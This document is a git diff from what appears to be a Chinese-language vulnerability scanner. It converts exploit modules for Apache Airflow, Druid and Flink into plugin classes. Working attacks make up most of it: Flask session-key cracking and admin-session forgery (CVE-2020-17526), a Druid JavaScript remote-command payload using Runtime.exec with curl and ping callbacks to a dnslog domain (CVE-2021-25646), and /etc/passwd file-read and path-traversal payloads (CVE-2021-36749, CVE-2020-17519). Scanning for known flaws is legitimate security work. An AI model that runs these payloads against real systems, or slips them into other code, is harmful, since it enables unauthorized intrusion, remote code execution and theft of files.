+        CVE-2020-17526
+            Payload: https://vulhub.org/#/environments/airflow/CVE-2020-17526/
+'''
+
+from PluginManager import Vuln_Scan
+from thirdparty import flask_unsign
+import re
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'admin/airflow/login',
+                'path2': 'admin/',
+            },
+            {
+                'path': 'airflow/login',
+                'path2': 'airflow/',
+            },
+            {
+                'path': 'login',
+                'path2': '',
+            },
+            {
+                'path': '',
+                'path2': '',
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheAirflow',
+            'vul_type': 'unAuthorized',
+            'vul_id': 'CVE-2020-17526',
+        }
+
+        headers = {}
+
+        for payload in self.payloads:    # * Payload
+            path = payload['path']                      # * Path
+
+            res1 = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res1 is None:
+                continue
+
+            if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)):      # * 判断响应包中是否有Set-Cookie
+                set_cookie = res1.headers['Set-Cookie']
+                flask_cookie = re.search(r'.{76}\.{1}.{6}\.{1}.{27}', set_cookie)   # * 是否存在Flask Cookie
+                if flask_cookie:
+                    cookie = flask_cookie.group()                                   # * 获取Flask Cookie
+                    c = flask_unsign.Cracker(cookie, quiet=True)                    # * 使用获取的Cookie创建Cracker对象
+                    file = open('lib/db/secretKey_fast.txt', encoding='utf-8')      # * secret密钥字典
+                    secretKeys = file.readlines()
+                    file.close()
+
+                    for key in range(len(secretKeys)):                              # * 去除\n
+                        secretKeys[key] = secretKeys[key].replace('\n', '')
+
+                    secretKey = c.crack(secretKeys)                                 # * 开始暴破secret
+
+                    if secretKey:                                                   # * 如果暴破成功, 会返回密钥, 否则为None
+                        session = flask_unsign.sign(                                # * 利用secret伪造session
+                            {'user_id': '1', '_fresh': False, '_permanent': True},
+                            secretKey
+                        )
+                        flask_session = {                                           # * 设置session
+                            'Cookie': 'session=' + session
+                        }
+                        headers.update(flask_session)                               # * 更新headers
+                        res2 = client.request(
+                            'get',
+                            payload['path2'],
+                            headers=headers,
+                            vul_info=vul_info
+                        )
+                        if res2 is None:
+                            continue
+
+                        if ((res2.status_code == 200) 
+                            and (
+                                ('<title>Airflow - DAGs</title>' in res2.text)
+                                or (('Schedule' in res2.text) 
+                                    and ('Recent Tasks' in res2.text))
+                                or (('const DAGS_INDEX =' in res2.text)
+                                    and ('window.location = DAGS_INDEX + "?search="+ encodeURI(search_query);' in res2.text))
+                            )
+                        ):
+                            results = {
+                                'Target': res2.request.url,
+                                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                                'Secret Key': secretKey,
+                                'Cookie': flask_session['Cookie'],
+                                # 'Request-1': res1,
+                                'Request': res2
+                            }
+                            return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheAirflow/cve_2020_17526.py b/payloads/ApacheAirflow/cve_2020_17526.py
deleted file mode 100644
index 9520419..0000000
--- a/payloads/ApacheAirflow/cve_2020_17526.py
+++ /dev/null
@@ -1,101 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from thirdparty import flask_unsign
-import re
-
-cve_2020_17526_payloads = [
-    {
-        'path': 'admin/airflow/login',
-        'path2': 'admin/',
-    },
-    {
-        'path': 'airflow/login',
-        'path2': 'airflow/',
-    },
-    {
-        'path': 'login',
-        'path2': '',
-    },
-    {
-        'path': '',
-        'path2': '',
-    }
-]
-
-def cve_2020_17526_scan(clients):
-    ''' Airflow 使用默认会话密钥, 这会导致在启用身份验证时冒充任意用户 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ApacheAirflow',
-        'vul_type': 'unAuthorized',
-        'vul_id': 'CVE-2020-17526',
-    }
-
-    headers = {}
-
-    for payload in cve_2020_17526_payloads:    # * Payload
-        path = payload['path']                 # * Path
-
-        res1 = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res1 is None:
-            continue
-
-        if ((res1.status_code == 200) and ('Set-Cookie' in res1.headers)):      # * 判断响应包中是否有Set-Cookie
-            set_cookie = res1.headers['Set-Cookie']
-            flask_cookie = re.search(r'.{76}\.{1}.{6}\.{1}.{27}', set_cookie)   # * 是否存在Flask Cookie
-            if flask_cookie:
-                cookie = flask_cookie.group()                                   # * 获取Flask Cookie
-                c = flask_unsign.Cracker(cookie, quiet=True)                    # * 使用获取的Cookie创建Cracker对象
-                file = open('lib/db/secretKey_fast.txt', encoding='utf-8')      # * secret密钥字典
-                secretKeys = file.readlines()
-                file.close()
-
-                for key in range(len(secretKeys)):                              # * 去除\n
-                    secretKeys[key] = secretKeys[key].replace('\n', '')
-
-                secretKey = c.crack(secretKeys)                                 # * 开始暴破secret
-
-                if secretKey:                                                   # * 如果暴破成功, 会返回密钥, 否则为None
-                    session = flask_unsign.sign(                                # * 利用secret伪造session
-                        {'user_id': '1', '_fresh': False, '_permanent': True},
-                        secretKey
-                    )
-                    flask_session = {                                           # * 设置session
-                        'Cookie': 'session=' + session
-                    }
-                    headers.update(flask_session)                               # * 更新headers
-                    res2 = client.request(
-                        'get',
-                        payload['path2'],
-                        headers=headers,
-                        vul_info=vul_info
-                    )
-                    if res2 is None:
-                        continue
-
-                    if ((res2.status_code == 200) 
-                        and (
-                            ('<title>Airflow - DAGs</title>' in res2.text)
-                            or (('Schedule' in res2.text) 
-                                and ('Recent Tasks' in res2.text))
-                            or (('const DAGS_INDEX =' in res2.text)
-                                and ('window.location = DAGS_INDEX + "?search="+ encodeURI(search_query);' in res2.text))
-                        )
-                    ):
-                        results = {
-                            'Target': res2.request.url,
-                            'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                            'Secret Key': secretKey,
-                            'Cookie': flask_session['Cookie'],
-                            # 'Request-1': res1,
-                            'Request': res2
-                        }
-                        return results
-    return None
diff --git a/payloads/ApacheAirflow/main.py b/payloads/ApacheAirflow/main.py
deleted file mode 100644
index 1616c7c..0000000
--- a/payloads/ApacheAirflow/main.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-    ApacheAirflow扫描类: 
-        Airflow 身份验证绕过漏洞
-            CVE-2020-17526
-                Payload: https://vulhub.org/#/environments/airflow/CVE-2020-17526/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-# from lib.tool.md5 import md5
-from lib.tool.thread import thread
-from payloads.ApacheAirflow.cve_2020_17526 import cve_2020_17526_scan
-
-class Airflow():
-    def __init__(self):
-        self.app_name = 'ApacheAirflow'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2020_17526_scan, clients=clients)
-        ]
-
-airflow = Airflow()
\ No newline at end of file
diff --git a/payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py b/payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py
new file mode 100644
index 0000000..7bd8301
--- /dev/null
+++ b/payloads/ApacheDruid/apache-druid-cve-2021-25646-rce.py
@@ -0,0 +1,109 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache Druid 远程代码执行
+    CVE-2021-25646
+        Payload: https://www.freebuf.com/vuls/263276.html
+                 https://cloud.tencent.com/developer/article/1797515
+
+Apache Druid 包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码, 
+    此功能在用于高信任度环境中, 默认已被禁用
+        但是, 在 Druid 0.20.0及更低版本中, 
+        经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求, 
+        利用 Apache Druid 漏洞可以执行任意代码
+'''
+
+from PluginManager import Vuln_Scan
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from lib.tool import check
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        # * 有回显/无回显 Payload
+        cve_2021_25646_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "%%DATASOURCE%%","parser": {"parseSpec": {"format": "javascript","timestampSpec": {},"dimensionsSpec": {},"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\A\\").next();return {timestamp:\\"2013-09-01T12:41:27Z\\",test: s}}","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 10}}'''
+        cve_2021_25646_no_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('COMMAND')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":5,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}'''
+
+        self.random_str = random_md5(6)  # * 随机6位字符串
+
+        self.payloads = [
+            # ! 回显POC
+            {
+                'path': 'druid/indexer/v1/sampler?for=filter',
+                'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + self.random_str)
+            },
+            {
+                'path': 'indexer/v1/sampler?for=filter',
+                'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + self.random_str)
+            },
+            # ! 无回显POC
+            {
+                'path': 'druid/indexer/v1/sampler?for=filter',
+                'data': cve_2021_25646_no_data.replace('COMMAND', 'curl DNSDOMAIN')
+            },
+            {
+                'path': 'druid/indexer/v1/sampler?for=filter',
+                'data': cve_2021_25646_no_data.replace('COMMAND', 'curl http://DNSDOMAIN')
+            },
+            {
+                'path': 'druid/indexer/v1/sampler?for=filter',
+                'data': cve_2021_25646_no_data.replace('COMMAND', 'ping -c 4 DNSDOMAIN')
+            },
+            {
+                'path': 'druid/indexer/v1/sampler?for=filter',
+                'data': cve_2021_25646_no_data.replace('COMMAND', 'ping DNSDOMAIN')
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '244d164411e9b78ca7074ec47f2c4f96'
+
+        vul_info = {
+            'app_name': 'ApacheDruid',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2021-25646',
+        }
+        
+        headers = {
+            'Content-Type': 'application/json;charset=utf-8',
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            dns_md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = dns_md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+            
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res(res.text, self.random_str)
+                or dns.result(dns_md, sessid)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+    
diff --git a/payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py b/payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py
new file mode 100644
index 0000000..bf0c6b1
--- /dev/null
+++ b/payloads/ApacheDruid/apache-druid-cve-2021-36749-fileread.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Apache Druid任意文件读取
+    CVE-2021-36749
+        Payload: https://cloud.tencent.com/developer/article/1942458
+
+Apache Druid对用户指定的HTTP InputSource没有做限制, 
+    并且Apache Druid默认管理页面是不需要认证即可访问的
+        因此未经授权的远程攻击者 可以通过构造恶意参数读取服务器上的任意文件
+    Apache Druid <= 0.21.1
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool import check
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'druid/indexer/v1/sampler?for=connect',
+                'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
+            },
+            {
+                'path': 'druid/indexer/v1/sampler?for=connect',
+                'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
+            },
+            {
+                'path': 'druid/indexer/v1/sampler?for=connect',
+                'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
+            },
+            # * path不一样
+            {
+                'path': 'indexer/v1/sampler?for=connect',
+                'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
+            },
+            {
+                'path': 'indexer/v1/sampler?for=connect',
+                'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
+            },
+            {
+                'path': 'indexer/v1/sampler?for=connect',
+                'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheDruid',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2021-36749',
+        }
+        
+        headers = {
+            'Content-Type': 'application/json;charset=utf-8',
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+            
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheDruid/cve_2021_25646.py b/payloads/ApacheDruid/cve_2021_25646.py
deleted file mode 100644
index a5a4ec0..0000000
--- a/payloads/ApacheDruid/cve_2021_25646.py
+++ /dev/null
@@ -1,94 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from lib.tool import check
-from time import sleep
-
-# * 有回显/无回显 Payload
-cve_2021_25646_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "%%DATASOURCE%%","parser": {"parseSpec": {"format": "javascript","timestampSpec": {},"dimensionsSpec": {},"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\A\\").next();return {timestamp:\\"2013-09-01T12:41:27Z\\",test: s}}","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 10}}'''
-cve_2021_25646_no_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('COMMAND')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":5,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}'''
-
-random_str = random_md5(6)  # * 随机6位字符串
-
-cve_2021_25646_payloads = [
-    # ! 回显POC
-    {
-        'path': 'druid/indexer/v1/sampler?for=filter',
-        'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + random_str)
-    },
-    {
-        'path': 'indexer/v1/sampler?for=filter',
-        'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + random_str)
-    },
-    # ! 无回显POC
-    {
-        'path': 'druid/indexer/v1/sampler?for=filter',
-        'data': cve_2021_25646_no_data.replace('COMMAND', 'curl DNSDOMAIN')
-    },
-    {
-        'path': 'druid/indexer/v1/sampler?for=filter',
-        'data': cve_2021_25646_no_data.replace('COMMAND', 'curl http://DNSDOMAIN')
-    },
-    {
-        'path': 'druid/indexer/v1/sampler?for=filter',
-        'data': cve_2021_25646_no_data.replace('COMMAND', 'ping -c 4 DNSDOMAIN')
-    },
-    {
-        'path': 'druid/indexer/v1/sampler?for=filter',
-        'data': cve_2021_25646_no_data.replace('COMMAND', 'ping DNSDOMAIN')
-    },
-]
-
-def cve_2021_25646_scan(clients):
-    ''' Apache Druid 包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码, 
-        此功能在用于高信任度环境中, 默认已被禁用
-            但是, 在 Druid 0.20.0及更低版本中, 
-            经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求, 
-            利用 Apache Druid 漏洞可以执行任意代码
-    '''
-    client = clients.get('reqClient')
-    sessid = '244d164411e9b78ca7074ec47f2c4f96'
-
-    vul_info = {
-        'app_name': 'ApacheDruid',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2021-25646',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json;charset=utf-8',
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-    }
-
-    for payload in cve_2021_25646_payloads:
-        dns_md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = dns_md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-        
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)                                    # * dnslog可能较慢, 等一会
-        if (check.check_res(res.text, random_str)
-            or dns.result(dns_md, sessid)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheDruid/cve_2021_36749.py b/payloads/ApacheDruid/cve_2021_36749.py
deleted file mode 100644
index 9e425b2..0000000
--- a/payloads/ApacheDruid/cve_2021_36749.py
+++ /dev/null
@@ -1,77 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2021_36749_payloads = [
-    {
-        'path': 'druid/indexer/v1/sampler?for=connect',
-        'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
-    },
-    {
-        'path': 'druid/indexer/v1/sampler?for=connect',
-        'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
-    },
-    {
-        'path': 'druid/indexer/v1/sampler?for=connect',
-        'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
-    },
-    # * path不一样
-    {
-        'path': 'indexer/v1/sampler?for=connect',
-        'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
-    },
-    {
-        'path': 'indexer/v1/sampler?for=connect',
-        'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
-    },
-    {
-        'path': 'indexer/v1/sampler?for=connect',
-        'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}'''
-    },
-]
-
-def cve_2021_36749_scan(clients):
-    ''' Apache Druid对用户指定的HTTP InputSource没有做限制, 
-        并且Apache Druid默认管理页面是不需要认证即可访问的
-            因此未经授权的远程攻击者 可以通过构造恶意参数读取服务器上的任意文件
-        
-        Apache Druid <= 0.21.1
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'ApacheDruid',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2021-36749',
-    }
-    
-    headers = {
-        'Content-Type': 'application/json;charset=utf-8',
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-    }
-
-    for payload in cve_2021_36749_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-        
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/ApacheDruid/main.py b/payloads/ApacheDruid/main.py
deleted file mode 100644
index 70abfcc..0000000
--- a/payloads/ApacheDruid/main.py
+++ /dev/null
@@ -1,39 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台 (不支持Windows平台)
-    Apache Druid扫描类: 
-        1. Apache Druid 远程代码执行
-            CVE-2021-25646
-                Payload: https://www.freebuf.com/vuls/263276.html
-                         https://cloud.tencent.com/developer/article/1797515
-
-        2. Apache Druid任意文件读取
-            CVE-2021-36749
-                Payload: https://cloud.tencent.com/developer/article/1942458
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.ApacheDruid.cve_2021_25646 import cve_2021_25646_scan
-from payloads.ApacheDruid.cve_2021_36749 import cve_2021_36749_scan
-
-class ApacheDruid():
-    def __init__(self):
-        self.app_name = 'ApacheDruid'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_25646_scan, clients=clients),
-            thread(target=cve_2021_36749_scan, clients=clients),
-        ]
-
-apachedruid = ApacheDruid()
diff --git a/payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py b/payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py
new file mode 100644
index 0000000..f04e488
--- /dev/null
+++ b/payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Flink 任意文件读取
+    CVE-2020-17519
+        Payload: https://vulhub.org/#/environments/flink/CVE-2020-17519/
+
+Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)
+    允许攻击者通过JobManager进程的REST接口, 读取JobManager本地文件系统上的任意文件
+'''
+
+from PluginManager import Vuln_Scan
+from lib.tool import check
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'},
+            {'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'},
+            {'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'},
+            {'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'},
+            {'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'},
+            {'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'ApacheFlink',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2020-17519',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/ApacheFlink/cve_2020_17519.py b/payloads/ApacheFlink/cve_2020_17519.py
deleted file mode 100644
index d04fb72..0000000
--- a/payloads/ApacheFlink/cve_2020_17519.py
+++ /dev/null
@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2020_17519_payloads = [
-    {
-        'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd',
-    },
-    {
-        'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd',
-    },
-    {
-        'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd',
-    },
-    {
-        'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts',
-    },
-    {
-        'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts',
-    },
-    {
-        'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts',
-    }
-]
-
